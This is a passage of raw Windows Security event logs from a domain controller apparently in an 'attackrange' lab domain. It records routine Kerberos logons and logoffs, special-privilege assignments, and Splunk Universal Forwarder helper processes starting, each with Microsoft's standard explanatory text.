Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263960
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78E9D1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263959
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x78E8E3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51700
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263958
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78E8E3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263970
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263969
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19d8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:39:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263971
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a34
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:39:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263972
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:39:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263973
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:39:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263975
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xeb8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:39:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263974
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:39:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263976
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78EAD2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:39:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263979
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x792329
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:39:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263978
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x792329
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51715
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:39:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263977
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x792329
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:40:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263981
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1678
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:40:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263980
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:40:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263982
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x8f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:40:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263983
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1750
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:40:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263984
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:40:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263986
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xae0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:40:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263985
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:40:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263989
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x795D11
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:40:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263988
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x795D11
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51729
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
